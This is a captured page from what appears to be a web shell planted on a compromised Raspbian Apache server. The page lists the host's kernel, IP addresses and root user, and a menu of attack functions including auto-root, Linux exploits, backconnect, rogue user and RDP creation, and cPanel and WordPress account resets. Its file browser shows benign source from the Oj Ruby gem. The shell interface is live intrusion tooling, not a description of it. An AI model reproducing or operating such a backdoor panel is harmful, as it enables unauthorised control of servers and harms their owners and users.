Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
oj /
[ HOME SHELL ]
Name
Size
Permission
Action
active_support_helper.rb
1.02
KB
-rw-r--r--
bag.rb
3.35
KB
-rw-r--r--
easy_hash.rb
1.92
KB
-rw-r--r--
error.rb
630
B
-rw-r--r--
json.rb
5.52
KB
-rw-r--r--
mimic.rb
7.35
KB
-rw-r--r--
saj.rb
1.5
KB
-rw-r--r--
schandler.rb
3.87
KB
-rw-r--r--
state.rb
4.21
KB
-rw-r--r--
version.rb
71
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : active_support_helper.rb
require 'active_support/time' module Oj # Exists only to handle the ActiveSupport::TimeWithZone. class ActiveSupportHelper def self.createTimeWithZone(utc, zone) ActiveSupport::TimeWithZone.new(utc - utc.gmt_offset, ActiveSupport::TimeZone[zone]) end end end Oj.register_odd(ActiveSupport::TimeWithZone, Oj::ActiveSupportHelper, :createTimeWithZone, :utc, 'time_zone.name') # This is a hack to work around an oddness with DateTime and the ActiveSupport # that causes a hang when some methods are called from C. Hour, min(ute), # sec(ond) and other methods are special but they can be called from C until # activesupport/time is required. After that they can not be even though # resond_to? returns true. By defining methods to call super the problem goes # away. There is obviously some magic going on under the covers that I don't # understand. class DateTime def hour() super end def min() super end def sec() super end def sec_fraction() super end def offset() super end end
Close